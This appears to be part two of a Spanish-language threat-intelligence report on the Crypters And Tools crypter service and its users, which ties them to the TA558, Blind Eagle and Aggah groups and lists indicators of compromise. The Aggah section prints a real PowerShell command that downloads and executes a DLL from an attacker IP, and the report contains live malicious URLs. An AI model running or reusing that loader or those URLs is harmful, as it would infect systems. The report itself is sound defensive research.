Autores: Aleksandr Badaev, Elena Furashova

• Al menos seis grupos de amenazas conocidos han utilizado Crypters And Tools en sus campañas.
• Algunas de estas agrupaciones muestran vínculos entre sí, los cuales se exponen en este artículo.
• El grupo Aggah, que no había sido mencionado públicamente desde 2022, continúa realizando ataques a nivel global.
• Se ha logrado identificar a varios usuarios del crypter.
• Algunos de estos usuarios están afiliados directamente a los grupos Blind Eagle y TA558 y son sus miembros.

En la primera parte de nuestro análisis presentamos el servicio Crypters And Tools, identificado durante la investigación de campañas maliciosas llevadas a cabo por distintos grupos. El informe se centró en la arquitectura interna de la herramienta y en su infraestructura asociada. En esta segunda parte, analizamos los actores que han empleado Crypters And Tools en sus campañas, las posibles relaciones entre ellos, sus características distintivas, así como a los usuarios del crypter, algunos de los cuales están vinculados directamente con los grupos analizados.

Además, nuestra investigación ha confirmado que el grupo Aggah continúa realizando ataques, a pesar de que algunos investigadores señalaron que había cesado su actividad en 2022.

Muchos investigadores se han encontrado con ataques que implicaban Crypters And Tools y han interpretado erróneamente algunas de sus características recurrentes (el uso de Ande Loader, la variable $codigo, la infraestructura de red del crypter) como exclusivas de actores de amenazas específicos. Consideramos que se trata de un error de atribución. Al final de este artículo, incluimos referencias a todos los informes disponibles públicamente que mencionan Crypters And Tools o sus versiones anteriores: los crypters Codigo.

En el presente artículo nos centramos en tres grupos de hackers principales — TA558, Blind Eagle y Aggah — así como en ciertos usuarios de Crypters And Tools que podrían estar vinculados a ellos. Para mayor claridad, la siguiente tabla ilustra algunas de las relaciones observadas entre estos actores.

Los tres grupos siguen activos y continúan llevando a cabo numerosas campañas. En la actualidad, Aggah parece haber dejado de utilizar Crypters And Tools, o bien sus campañas más recientes han quedado fuera de nuestro alcance de visibilidad. No obstante, el grupo permanece activo, como se detallará en la sección correspondiente de este artículo.

Mientras tanto, TA558 y Blind Eagle siguen empleando activamente el crypter.

Por ejemplo, en un report publicado en marzo por Check Point Research, se describieron ataques atribuidos a Blind Eagle. Observamos la campaña mencionada ya en febrero, en particular un IP 62.60.226[.]64 que también fue señalado por Check Point como un indicador de compromiso. En ese servidor se alojaban múltiples archivos asociados con Crypters And Tools, aunque en esa campaña específica es posible que el crypter no se empleara directamente.

Más adelante, en la sección dedicada a los usuarios de Crypters And Tools, hablaremos también de campañas asociadas a Blind Eagle, llevadas a cabo por actores que operan bajo los alias deadpoolstart2025 y ABBAS, y que muestran una clara vinculación con el grupo.

En el caso de TA558, un ejemplo representativo del uso de Crypters And Tools puede encontrarse en una campaña de phishing observada en marzo, en la que se utilizó el siguiente archivo:

• Purchase Inquiry.xla (SHA-256: 55ea07bbd700488fd6330d289f210b2da119401a9e27009472d1afec2f6c6339)
  La campaña incluía varios URL característicos de TA558:
• http://104.168.7.38/xampp/knct/nicefeelingwithbestgoodthinksfor.txt
• http://104.168.7.38/xampp/knct/Lightgreatloversonhereforlovingpeoplesalot.hta
• http://104.168.7.38/xampp/knct/Lightgreatloversonhereforlovingpeoplesalot.png

Los usuarios Brainiac, syscore y negrocock, vinculados a TA558, también serán mencionados en la sección correspondiente del informe/artículo.

Cabe destacar que tanto TA558 como Blind Eagle no se limitan al uso exclusivo de Crypters And Tools en sus campañas. Por ejemplo, en abril de 2025, detectamos un correo malicioso representativo de TA558.

El correo electrónico contenía dos documentos maliciosos que descargaban una carga maliciosa de un servidor con un patrón típico de TA558:

• http://216.9.224.185/33/eco/goodthingsforbestfeaturesgivenmegoodthingsforbest_______________goodthingsforbestfeaturesgivenme_____________goodthingsforbestfeaturesgivenme.doc

A continuación, se descargó y ejecutó goodthingsforbestfeaturesgivenme.vbe, lo que provocó que la víctima se infectara con el malware Remcos RAT. Cabe señalar que Crypters And Tools no fue utilizado en esta ataque.

En la primera parte de nuestro artículo, ya mencionamos que llegamos a identificar Crypters And Tools mientras investigábamos las actividades de los grupos PhaseShifters y UAC-0050. Las coincidencias entre ambos actores se analizan en detalle en una de nuestras publicaciones anteriores. Ambos grupos utilizaron Crypters And Tools en sus campañas; no obstante, no se ha observado ninguna relación directa entre ellos y los desarrolladores del crypter.

En cuanto a PhantomControl, solo existen dos informes públicos, ambos publicados por eSentire. El primero no hace mención a Crypters And Tools, pero el segundo indica que el grupo comenzó a emplear Ande Loader. En dicho análisis, esta herramienta fue atribuida a Blind Eagle; sin embargo, dado que Ande Loader forma parte de Crypters And Tools, esta atribución resulta inexacta. Además, los enlaces a paste.ee y las imágenes referenciadas en el informe están directamente relacionados con el crypter, lo que permite afirmar con certeza que PhantomControl utilizó Crypters And Tools en sus campañas.

En diversos artículos en los que los investigadores se han encontrado con Crypters And Tools, se han producido errores de atribución entre grupos de hackers debido a la falta de información previa que indicara que este crypter constituye una herramienta independiente, y no un desarrollo exclusivo de un actor concreto. Un ejemplo de ello es un informe publicado en 2023 por investigadores de Qi An Xin, donde se plantea la hipótesis de que el grupo Aggah podría ser una subagrupación de Blind Eagle, basándose en similitudes significativas en sus TTP, cierto solapamiento en el malware utilizado y en el hecho de que ambos grupos tienen como objetivo regiones geográficamente cercanas. Aunque no descartamos por completo esta posibilidad, ya en un artículo anterior demostramos que muchos de estos solapamientos pueden explicarse por el uso compartido de Crypters And Tools. No obstante, un análisis detallado de las etapas finales de las campañas revela diferencias claras entre TA558 y Blind Eagle.

En esta sección destacaremos algunos de los rasgos característicos de ambos grupos que permiten diferenciarlos con mayor precisión. Estos elementos servirán de base para establecer conexiones entre dichos actores y varios usuarios del crypter, que se abordarán en las secciones posteriores

3.1.  URLs y nombres de archivo característicos de TA558

Las campañas atribuidas a TA558 suelen incluir patrones de URL que no se asocian directamente con la infraestructura de Crypters And Tools. Algunos ejemplos:

• 103.67.162.213/xampp/gd/kissingagirlissoeasyrecentlyireallyfeelsheismygirlineverwanttohurtherweneverwantotkissher_______ilovehertrulyfromtheheartiloveyou..doc
• 172.232.175.155/88122/bh/bh.h.h.h.hhhhh.doC
• 172.234.239.22/990099/gf/l.c.c.c.ccx.doC

Además, las campañas de TA558 suelen presentar nombres de archivo malicioso con patrones recurrentes. Ejemplos típicos:

• PO-24052800.xls
• factura 00005111, 005114, 005115.pdf.xlam
• Orden de compra 4000171682.docx

Aunque estos nombres son relativamente distintivos, cabe destacar que se han observado patrones similares en campañas llevadas a cabo por el actor conocido como bukky101, del cual se hablará más adelante en este artículo.

3.2.  Dominios característicos de TA558

Los grupos TA558, Blind Eagle y Aggah hacen uso de diferentes servicios de DNS dinámico, como duckdns.org, 3utilities o us.archive.org. En la mayoría de los casos, los dominios registrados en estas plataformas están vinculados con la infraestructura de Crypters And Tools. Por ejemplo, una de las URL que inicialmente habíamos atribuido a la infraestructura de TA558 fue posteriormente encontrada embebida en una muestra del propio crypter:

• http://servidorwindows.ddns.com.br/Files/js.jpeg

Al mismo tiempo, hemos observado dominios empleados en ataques que guardan gran similitud con los asociados a TA558, y que contienen archivos con nombres largos característicos, aunque no aparecen en la configuración interna del Crypters And Tools. A continuación se presentan algunos ejemplos de estos dominios, que comparten un patrón común basado en la repetición de letras en los nombres de los días de la semana:

• mondayyyyvbsgreeceee.duckdns.org
• wednesdayyyyyyfile.duckdns.org
• thursdayyyyyyfileeee.duckdns.org
• fridayyyyvert.3utilities.com

3.3. Diferencias de infraestructura entre TA558 y Blind Eagle

El grupo Blind Eagle utiliza predominantemente ASNs colombianos, mientras que no se ha observado este comportamiento en las campañas atribuidas a TA558. La siguiente tabla recoge algunos de los sistemas autónomos (ASN) utilizados habitualmente por cada grupo, junto con ejemplos de direcciones IP vinculadas a TA558 y Blind Eagle dentro de dichos rangos.

Aggah (también conocido como Hagga) es un grupo de amenazas que lleva a cabo campañas de phishing a escala global. Su arsenal de malware incluye RevengeRAT, Agent Tesla, Nanocore RAT, Warzone RAT, njRAT, AzoRult, entre otros. Uno de los elementos más característicos de sus cadenas de ataque es el uso frecuente de infraestructura sin servidor (serverless) para alojar cargas maliciosas, recurriendo a plataformas como Blogspot, Pastebin o archive.org. En 2018, un artículo publicado en FreeBuf reveló la posible identidad de los responsables del grupo y los relacionó con actores de origen paquistaní.

A continuación, se analizan varios vínculos entre TA558 y Aggah, basados en inteligencia de fuentes abiertas y campañas observadas previamente. Sin embargo, sería necesario un análisis más profundo para confirmar que se trata de un mismo grupo. En este momento, resulta razonable suponer que Aggah mantiene vínculos con TA558, posiblemente a través del intercambio de herramientas, malware y estrategias de ataque.

Para ilustrar esta conexión, comenzamos revisando las primeras campañas conocidas de Aggah, documentadas antes de que el grupo recibiera su nombre.

4.1. Primeras menciones a Aggah

Los primeros indicios de actividad vinculada a este actor de amenazas se remontan a 2018, en el contexto de las campañas de malware Roma225 y Operation Commando. La atribución de estas campañas al grupo Aggah se detalla en las secciones siguientes.

4.1.1. Ataques en 2018

La campaña maliciosa Roma225 fue analizada y publicada en diciembre de 2018 por investigadores de la empresa Yoroi. En su informe se describía la distribución de RevengeRAT a través de documentos de PowerPoint, con las cargas maliciosas alojadas en la plataforma Blogspot. De ese análisis conviene destacar dos elementos clave. Los metadatos del documento distribuido indicaban como autor a C.D.T Original. Se observó el uso de la cadena "CDT" en nombres de variables dentro del código.

En ese momento, el grupo aún no había recibido el nombre de Aggah. Sin embargo, es relevante señalar que TA558 fue mencionado por primera vez en un informe publicado por Proofpoint ese mismo año (2018). Curiosamente, esa investigación hacía referencia a los mismos metadatos y a los mismos indicadores de compromiso en la red que los observados en la campaña Roma225: el autor del documento era C.D.T Original y el dominio utilizado era cdtmaster[.]com. No obstante, el informe de Proofpoint no establecía una conexión directa entre Roma225 y TA558.

4.1.2. Ataques en 2019

En marzo de 2019, la unidad Unit 42 de Palo Alto Networks publicó un artículo sobre una campaña denominada Operation Commando, dirigida contra cadenas hoteleras. La campaña presentaba múltiples similitudes con Roma225, que se resumen en la tabla comparativa que se muestra a continuación. Teniendo en cuenta estos puntos en común, resulta razonable concluir que ambas campañas fueron llevadas a cabo por el mismo actor, que en ese momento aún no había recibido el nombre de Aggah.

Durante 2019, los ataques a hoteles continuaron, incluyendo campañas atribuidas a TA558. Sin embargo, hasta ese momento, no se habían detectado coincidencias claras entre las actividades de TA558 y las de Aggah en dichas campañas.

4.1.3. Hagga == Aggah. El origen del nombre

En abril de 2019, Unit 42 publicó un artículo titulado "Aggah Campaign", en el que se describían ataques que empleaban RevengeRAT junto con el uso malicioso de servicios legítimos como Pastebin, Blogspot y Bit.ly. La campaña fue bautizada como "Aggah" debido a la aparición de la cadena "hagga" en la configuración del malware, la cual también era utilizada como nombre de usuario en Pastebin. Más allá del nombre, el informe identificaba varias coincidencias con campañas anteriores, lo que permitió establecer una línea de continuidad en la actividad del grupo:

• Nombre de mutex con un error tipográfico en "System32″ — RV_MUTEX-WindowsUpdateSysten32,
• Uso de palabras clave como oldman, steve, hagga y roma225 en la configuración de RevengeRAT
• Indicadores de red coincidentes con ataques anteriores: office365update.duckdns[.]org, systen32.ddns[.]net.

Estos hallazgos permitieron confirmar que el grupo Aggah estaba detrás de las campañas Roma225 y Operation Commando.

Uno de los elementos más destacados del informe fue la presencia del identificador HOTEIS NOVOS ("hoteles nuevos", en portugués) dentro de la configuración del malware. Este detalle resulta particularmente significativo, ya que TA558 también llevaba a cabo en esa época campañas de phishing dirigidas al sector hotelero, con contenidos y documentos redactados en portugués.

4.1.4. Ataques en 2020–2022

Entre 2019 y 2021, el grupo Aggah distribuyó el malware AzoRult mediante su propio panel de comando y control, conocido como ManaTools. El término "mana" aparece de forma recurrente en relación con este actor, tanto en los metadatos de documentos como en nombres de dominio. En una de las secciones siguientes, se analizará una posible conexión entre Aggah y Crypters And Tools, y esta convención de nomenclatura constituye uno de los elementos de apoyo para dicha hipótesis.

Ejemplos de dominios utilizados por el grupo Aggah en 2019:

• mastermana1.serveirc[.]com
• mastermana2.serveirc[.]com
• mastermana3.serveirc[.]com
• mastermana4.serveirc[.]com
• mastermana5.serveirc[.]com

Durante el periodo 2020–2022, se identificaron varias conexiones relevantes entre TA558 y Aggah:

• Similitud en la geografía de los ataques: principalmente América Latina y Europa Occidental.
• Conjunto de herramientas maliciosas similares: ambos grupos han utilizado Remcos RAT, RevengeRAT y AzoRult.
• En 2021, la dirección IP 3.218.4.249 fue utilizada por ambos grupos para alojar cargas maliciosas.
• Uso compartido del prefijo "cdt" en nombres de dominio:
  • warzonecdt[.]duckdns[.]org (ТА558, fuente: Proofpoint),
  • ccnewcdt[.]duckdns[.]org (Aggah, dominio resuelto en 192.154.226[.]47, fuente: Team Cymru).
• Coincidencias en metadatos y similitudes en los macros de los documentos maliciosos

4.2. Ataques en 2023–2025

Aunque los artículos públicos sugerían que Aggah cesó su actividad en 2022, hemos identificado varios indicadores que apuntan a que el grupo sigue activo.

Durante la búsqueda de señales de actividad reciente, localizamos archivos cuyo estilo de codificación y ciertos elementos característicos recordaban claramente a campañas anteriores de Aggah. Investigaciones posteriores relacionaron estos elementos con una operación de phishing denominada MEME#4CHAN, descrita en un informe publicado por Securonix en 2023. Si bien dicha publicación no atribuía la campaña a ningún grupo en particular, las similitudes encontradas apuntan con fuerza a Aggah como probable autor.

Varios indicadores clave coinciden con los patrones históricos de Aggah:

• Temáticas de los correos centradas en el sector hotelero y turístico. Aunque estos temas son comunes en campañas de phishing, Aggah los ha utilizado repetidamente. Además, los nombres de los documentos aparecían tanto en inglés como en portugués, al igual que en las campañas de 2019.
• Uso de infraestructura sin servidor (serverless): plataformas como Blogspot, MediaFire, usrfiles.
• Estilo de codificación: muchos de los scripts parecían escritos manualmente, con nombres de variables poco convencionales e incluso humorísticos, y el uso de palabras en urdu, lo que coincide con hipótesis anteriores sobre un posible origen pakistaní del grupo.

Un ejemplo especialmente llamativo fue un script de PowerShell que contenía la variable $ALLSAVEBACKUP, que apuntaba a la página de Blogspot backuphotelall.blogspot[.]com, junto con una cadena de comentario peculiar que también apareció en campañas posteriores de Aggah.

La página de Blogspot se utilizaba para alojar archivos maliciosos que también fueron encontrados en otros dominios de Blogspot y en repositorios de Bitbucket. Uno de esos archivos, all.txt, era accesible desde las siguientes direcciones:

Estos enlaces están asociados a campañas posteriores a MEME#4CHAN. Por ejemplo, el dominio hotelbackuppowaug.blogspot[.]com fue utilizado para alojar un archivo denominado lnvoice 1882936796.js, cuyo código incluía comentarios similares a los utilizados en scripts anteriores de Aggah. Un análisis detallado de esta muestra está disponible en AnyRun.

El análisis de estas campañas condujo a otra iniciada a finales de 2023, en la que Aggah comenzó a distribuir malware con temáticas relacionadas con impuestos y facturas, utilizando principalmente XWorm o Agent Tesla. El uso de Blogspot y Bitbucket continuó, y la estructura de los scripts apenas cambió respecto a campañas anteriores.

Un ejemplo de esta campaña: Robert_Michael_Tax_2023.js, un archivo JavaScript ofuscado que contactaba con el repositorio de Bitbucket kimkardaikehsi para descargar Agent Tesla. El código del script mantenía una estructura muy similar a las versiones previas.

Además, los indicadores de red mostraban el uso de términos como "cpa" y "mana":

En 2025, las campañas de Aggah continúan activas, aunque las cargas maliciosas principales ahora son Rhadamanthys y XWorm. Una cadena de infección típica comienza con un archivo JavaScript ofuscado (a menudo con nombres relacionados con impuestos o formularios oficiales), que finalmente conduce a la ejecución de código PowerShell (Figura 18):

Al acceder a la página de Blogspot, se produce una redirección automática a un repositorio de Bitbucket, desde donde se descarga el script final de PowerShell, encargado de instalar el malware en el dispositivo de la víctima. Cabe señalar que, en algunos casos, se realiza una comprobación adicional de geolocalización antes de la descarga de la carga maliciosa, lo que permite a los atacantes seleccionar versiones del malware adaptadas a la región objetivo. Se pueden encontrar ejemplos de infecciones con XWorm y Rhadamanthys en informes disponibles en AnyRun.

4.2.1. Más coincidencias entre Aggah y TA558

En 2024, el investigador IdaNotPro publicó un análisis de un archivo de phishing atribuido a TA558, en una entrada de blog titulada "TA558 Targeting Brazil". La campaña presentaba elementos conocidos: cebos de phishing relacionados con el sector hotelero y dominios de C2 que incluían la cadena "cdt", un patrón habitual en la infraestructura tanto de TA558 como de Aggah.

Al comparar el archivo analizado con muestras documentadas previamente de Aggah, identificamos varios solapamientos notables:

• En una de las fases del script de PowerShell, se descargaba contenido desde el dominio detail-booking.com[.]br, un comportamiento similar al observado en cadenas de ataque atribuidas a Aggah. Por ejemplo, TA558 utilizaba una función llamada kimkarden, mientras que en las muestras de Aggah se hacía referencia al usuario de Bitbucket kimkardaikeshi. Las estructuras del código también presentaban similitudes.

• Varios archivos vinculados al dominio detail-booking.com[.]br (utilizado por TA558) seguían patrones de nomenclatura coincidentes con los utilizados en campañas anteriores de Aggah.

• Uno de los archivos de TA558 que se comunicaba con el dominio de C2 final cdt2023.ddns.net contenía en su configuración la cadena "CPA", un indicador recurrente observado en operaciones previas de Aggah.

Pese a las similitudes en infraestructura y técnicas utilizadas, comparar las campañas de Aggah y TA558 no permite afirmar con certeza que se trate del mismo grupo. Sin embargo, este análisis pone de manifiesto que existe un posible intercambio de herramientas, ideas y recursos entre ambos actores.

4.3. Uso de Crypters And Tools por parte del grupo Aggah

En la sección dedicada a la actividad de Aggah entre 2020 y 2022, ya mencionamos el uso de un panel de control conocido como ManaTools. En 2021, el grupo comenzó a utilizar el crypter 3LOSH, así como FsocietyAndTools, una de las primeras versiones de lo que más adelante evolucionaría como Crypters And Tools. Durante el análisis de campañas realizadas entre 2021 y 2022, identificamos varios artefactos que apuntan a un posible vínculo entre Aggah y la familia de crypters Codigo. Por ejemplo, la dirección IP 198.50.177[.]251 fue utilizada para alojar múltiples recursos, entre ellos un directorio llamado mastermana, que contenía cargas maliciosas relacionadas con campañas de Aggah. También alojaba una cuenta vinculada al desarrollador del crypter, identificado como nodetecton, la cual aparecía en la cadena de ejecución del crypter.

-windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://nodetecton@198.50.177.251/dll/1.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.85618406295/anamretsam/152.771.05.891//:ptth'))"

Además, como se indicó anteriormente, entre 2019 y 2021, investigadores observaron el uso recurrente del panel ManaTools, desarrollado por Aggah, en varias de sus campañas. En uno de los ataques detectados en 2022, se identificó el uso de XWorm como carga maliciosa. En este caso, el canal C2 era un bot de Telegram, con el que se comunicaba la cuenta @mastermana.

La búsqueda de referencias a este alias en Telegram condujo a un canal de YouTube denominado "Tiny Technology", que contiene vídeos de demostración de distintos exploits. La mayoría de estos vídeos muestra de forma destacada el logotipo de ManaTools, pero también se identificaron otros elementos relevantes:

• Nombres de usuario en los entornos y máquinas virtuales (Master MANA, 007, entre otros).
• Uso del repositorio Bitbucket hogya, que ya había sido vinculado previamente a campañas de Aggah (Figura 24).
• Interfaz del crypter Crypters And Tools con los logotipos de ambas herramientas, lo que sugiere una posible colaboración o integración (Figura 25).
• Presencia activa de Crypters And Tools en el sistema del atacante durante 2023 (Figura 26).

Como se indicó en la primera parte del informe, el número máximo de usuarios activos del crypter que identificamos fue de 42 (al 26 de noviembre de 2024). Cabe destacar que esta lista incluía administradores del servicio, usuarios con distintos alias pero con el mismo HardwareID, así como cuentas de prueba. Por lo tanto, la cantidad real de suscriptores activos del crypter era inferior.
Entre ellos, identificamos varios usuarios de particular interés.

5.1. bukky101

El siguiente usuario en la base de datos llamó nuestra atención.

Este actor fue mencionado por los especialistas de eSentire en un artículo dedicado a campañas de phishing que utilizaban Ande Loader, lo que finalmente conducía a la infección con el stealer 0bj3ctivity. Según el informe, los datos robados eran enviados a un bot de Telegram operado por un usuario identificado como bukky101. De acuerdo con nuestro análisis, está claro que en esa campaña se empleó Crypters And Tools.

Llevamos a cabo una investigación más profunda sobre este actor y sus operaciones. Por ejemplo, en mayo de 2024, bukky101 distribuyó un ejemplar de Agent Tesla (SHA-256: 5a8794fa12ff401f9f7212e497d5d877010f493e3bb028abd54cb12f60fc550f). Los datos eran exfiltrados a través de un servidor SMTP controlado por el atacante en boydjackson[.]org. Cabe destacar que el malware utilizaba la contraseña Bukky101@, estableciendo un vínculo directo entre la muestra y el alias. Esta campaña fue descrita en detalle en el artículo mencionado.

Durante nuestro análisis, identificamos víctimas en un amplio abanico de países: Armenia, Grecia, India, Irak, Italia, Chipre, Colombia, Malasia, Emiratos Árabes Unidos, Pakistán, Arabia Saudita, Singapur y Turquía. Las víctimas pertenecían a sectores muy diversos, y no se identificó un patrón claro en la selección de objetivos por parte de bukky101.

En uno de los incidentes, el atacante ejecutó accidentalmente el malware en su propio equipo, lo que nos permitió acceder a una amplia telemetría, incluyendo:

• contenido del portapapeles,
• lista de aplicaciones instaladas,
• información del sistema, como IP, antivirus, emuladores y detección de sandbox,
• claves de licencia de Windows,
• historial del navegador,
• historial de descargas,
• sitios web más visitados,
• datos de sesión de aplicaciones como Telegram y Skype,
• redes Wi-Fi almacenadas con sus nombres y contraseñas.

Estos datos permitieron atribuir con alta confianza que bukky101 reside en Nigeria, conclusión respaldada tanto por la geolocalización de IP como por el uso de servicios locales de Internet, concretamente de Airtel Nigeria.

Además, descubrimos que este actor participaba en campañas masivas de phishing con alcance global. Para febrero de 2025, bukky101 había enviado más de 6.160 correos electrónicos de phishing únicos. A continuación, se presentan algunos ejemplos de líneas de asunto que ilustran la variedad temática de las campañas de ingeniería social:

• DETAIL OF H Sale order # 128578 (PAKISTAN.PACKAGES)
• Position for the Head of IT / Manager IT
• Прайс лист на продукцию
• محاكم راس الخيمة إعلان:3100134384
• [Gabrini Cosmetics]: New order #80464
• Re: Proposal of Stall Design and Fabrication for AAHAR Expo 04-08 March 2025 (New delhi)
• ✅ Нов термин за работилница: Последни измени на Законот за јавни набавки, актуелни теми и предизвици
• Atașez și poze cu , coletul ce mi-a ajuns , și factura lângă
• Factura fiscala cutii carton_22.11.2024
• Dit verandert er in de tarieven en voorwaarden op ons platform
• REQUEST FOR PROPOSAL FOR WORLD VISION ZIMBABWE

La mayoría de estos correos contenían archivos HTML con campos de inicio de sesión pre-rellenados con la dirección de correo del objetivo. Al introducir la contraseña, se mostraba un mensaje de error indicando que era inválida, pero en ese mismo instante las credenciales eran exfiltradas mediante una solicitud enviada a un bot de Telegram —operado, en este caso, por otro usuario: @Gfcafmin.

También identificamos un directorio abierto asociado a bukky101, alojado en la IP 37.49.228.234, el cual fue mencionado en una publicación de la red social X.

Durante la investigación, descubrimos que bukky101 colaboraba con otros individuos del cibercrimen. Uno de sus socios operaba el servidor 185.38.142.224, utilizado para distribuir campañas de phishing a nivel mundial. Según nuestros datos, desde esa dirección IP se enviaron al menos 60.300 correos en un solo día.

A continuación, un ejemplo de uno de esos correos:

Al hacer clic en el enlace, se iniciaba la descarga de un archivo JavaScript desde:

• https://21ninety.info/file/Purchase-Order.js

Este script obtenía información adicional desde paste.ee y luego realizaba una solicitud a través de la API de Crypters And Tools para descargar la siguiente carga útil:

• 3005.filemail.com/api/file/get?filekey=

Los datos extraídos finalmente se enviaban a un bot de Telegram operado por el usuario @Mastersolution2 ("To The World Master Solution").

Cabe recordar que investigaciones previas ya habían señalado vínculos entre la agrupación Aggah y actores nigerianos que reutilizaban su arsenal. Esta observación es coherente, al menos parcialmente, con los hallazgos descritos anteriormente.

5.2. Blind Eagle: deadpoolstart2025 y ABBAS

Durante nuestra investigación sobre el grupo Blind Eagle, identificamos un servidor con dirección IP 181.71.217.114, perteneciente a un ASN bien conocido asociado a esta agrupación: Colombia Movil (AS27831). La mayoría de los dominios vinculados a esta dirección IP seguían el patrón strekhostYYYY, como por ejemplo: strekhost2024[.]duckdns[.]org. Según un repositorio público en GitHub, estos dominios fueron atribuidos a Blind Eagle por investigadores de Zscaler.

Además de los dominios con el patrón strekhost, identificamos otros adicionales:

• deadpoolstart2025.duckdns.org
• deadpoolstart2026.duckdns.org
• deadpoolstart2051.duckdns.org

Asimismo, se localizaron dominios adicionales con el nombre deadpoolstart y diferentes años, alojados en otra IP (179.14.11.213), como por ejemplo: deadpoolstart2035.duckdns.org.

Resultó que la base de datos de Crypters And Tools contenía un usuario registrado con el alias deadpoolstart2025.

Una de sus campañas se desarrolló de la siguiente manera:

El 14 de noviembre de 2024, el atacante envió un correo malicioso suplantando la identidad de un fabricante farmacéutico colombiano.

El enlace conducía a un archivo de Google Drive que alojaba un archivo comprimido con contraseña llamado: FOLIO_INCONSISTENCIA_REVISION_FISCAL_CARTERA_DETALLES_DETALLES_AMPLIADOS_CODIGO_VERIFICACION_ad851874148487ff17817ca2545434453154617ff5464484171525541748594ca6544981894ff11258749565284_XML.rar (SHA-256: 5fe3f4e4ab026fbcd0b595c7b35eb3b3997cae0fc8b92728b0bd556a3ec3c092). La contraseña se incluía directamente en el cuerpo del mensaje. Dentro del archivo comprimido se encontraba un fichero VBS (SHA-256: 937fcba2f15c795a209032a36a921fe9f53ea7a47e7295573cd1c0ebb8d9d241, que al ejecutarse, se añadía al inicio automático del sistema y descargaba un script malicioso desde paste.ee.

El script descargado contenía un comando PowerShell codificado en Base64, en el cual figuraba la ya conocida variable $codigo. Una vez iniciado, el script obtenía la siguiente carga útil a través de la API de Crypters And Tools, alojada en 1017.filemail.com, y además se conectaba a files.catbox.moe. El resultado final de esta cadena de infección fue la ejecución de AsyncRAT, con un servidor C2 que ya no pertenecía a la infraestructura del crypter, sino directamente al atacante — deadpoolstart2025.duckdns.org (181.71.217.114).

Identificamos múltiples campañas vinculadas a este usuario, con un pico de actividad entre noviembre de 2024 y febrero de 2025. En todas las campañas documentadas, se utilizó AsyncRAT. Un detalle particularmente llamativo fue el mutex de AsyncRAT utilizado en estos ataques:

• zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzNUEVOHOSTMALDITASEA

Durante el análisis también identificamos un servidor de Crypters And Tools utilizado para interactuar con el crypter mediante su API. En uno de los registros, se observó una solicitud proveniente de un usuario con el alias ABBAS:

• http://91.92.254.29/Users_API/ABBAS/file_odpxh4oq.2bf.txtn

Al examinar con más detalle la cadena de ataque, se evidenciaron claras correlaciones con las operaciones de Blind Eagle. Por ejemplo, se emplearon direcciones IP como 191.93.113.10 y 152.201.184.91, ambas pertenecientes a proveedores colombianos frecuentemente utilizados por el grupo. Asimismo, la estructura del ataque coincidía con las campañas descritas en un informe reciente de Check Point.

El usuario ABBAS figuraba en todas las versiones de la base de datos de Crypters And Tools que analizamos durante el curso de la investigación.

En conclusión, a diferencia de bukky101, cuya atribución a un grupo específico no pudo establecerse con certeza, las actividades de deadpoolstart2025 y ABBAS coinciden completamente con los TTP conocidos de Blind Eagle: desde el idioma utilizado hasta la infraestructura de servidores y el perfil de las víctimas. Por tanto, evaluamos con alto grado de confianza que estos usuarios o bien forman parte de Blind Eagle o mantienen una colaboración directa con el grupo.

5.3. TA558: Brainiac, syscore y negrocock

Como ya se demostró en el caso del usuario ABBAS, algunos usuarios de Crypters And Tools fueron identificados durante el análisis de las actividades de grupos específicos, en este caso Blind Eagle y TA558.

Dos de estos usuarios — BrainiacMAX y syscore — fueron detectados interactuando con la infraestructura del crypter a través de su API:

• http://91.92.254.14/Users_API/BrainiacMAX/file_ksg3fckt.hot.txt
• http://66.70.160.254/Users_API/syscore/file_ikvt3ei1.mgv.txt

En el capítulo "Características de TA558 y sus diferencias con Blind Eagle", describimos rasgos distintivos que permiten identificar a TA558. En este caso, la cadena de ataque asociada a BrainiacMAX es un ejemplo clásico de actividad de TA558, que incluye infraestructura alojada en AS-COLOCROSSING y nombres de archivos con patrones muy particulares:

• http://192.3.216.148/uh.ee.uh.ee.uhuheee.doc
• http://192.3.216.148/datingloverstartingAgain.vbs

Además, los datos exfiltrados fueron enviados mediante un servidor SMTP legítimo pero comprometido en Rumanía — una técnica alineada con el comportamiento conocido del grupo TA558 y observada desde nuestro primer artículo.

Se detectó un patrón similar en el caso del usuario syscore. En su ataque se utilizó un documento Excel con un nombre muy característico de TA558: Product Inquiry466789.xls (SHA-256: 3a7d034a793a0f03dc9930446aebf326320140584eeb171909962ec7123f9e5e). Al ejecutarse, el archivo descargaba una plantilla RTF desde:

• http://51.81.235.253/66166/hd/hd.d.d.d.dddd.doC

Posteriormente, aparecía un archivo VBS — también con un nombre que sigue la convención típica del grupo:

• http://51.81.235.253/66166/catcallingfemalecattogiveflowersgreat.gif

Ambos usuarios estaban presentes en la base de datos de Crypters And Tools.

Al igual que en los casos de deadpoolstart2025 y ABBAS, podemos afirmar con confianza que estos usuarios — BrainiacMAX y syscore — están vinculados a un grupo documentado públicamente, en este caso TA558.

También se identificó a otro usuario, negrocock, de forma similar:

• http://94.156.65.247/Users_API/negrocock/file_mq5uppna.ldt.txt

Sus ataques presentaban patrones típicos de TA558:

• http://198.46.178.144/morningfiledatinglover.vbs
• http://198.46.178.144/eveningfiledatinglover.vbs

5.4. KareemHacker

Otro usuario presente en la base de datos de Crypters And Tools es KareemHacker:

Kareem.Hacker es un hacker, presumiblemente originario de Marruecos, al que se le atribuyen al menos 538 ataques de desfiguración (defacement) de sitios web según mirror-h (un portal que recopila este tipo de datos), y hasta 1.671 según zone-h. Este usuario mantiene también una cuenta en GitHub, un perfil en X (anteriormente Twitter) y varios canales en YouTube, uno de los cuales muestra vídeos donde escribe letras en árabe y muestra sitios web que ha desfigurado. Su cuenta de X se encuentra actualmente bloqueada por violaciones a las políticas, tras denuncias de usuarios cuyos sitios fueron comprometidos.

Cabe destacar que Kareem Hacker podría ser un nombre y apellido legítimo aunque poco común. Por el momento, no es posible confirmar con certeza que el usuario de Crypters And Tools y el defacer conocido como Kareem.Hacker sean la misma persona.

5.5. HeadMaster

Durante nuestro análisis sobre Crypters And Tools, analizamos diversos mercados, sitios web y otras plataformas donde se comercializa este crypter. Uno de estos portales es nitrosoftwares[.]com, que ofrece una amplia gama de herramientas como exploits, crypters, loggers, crypto clippers, entre otros.

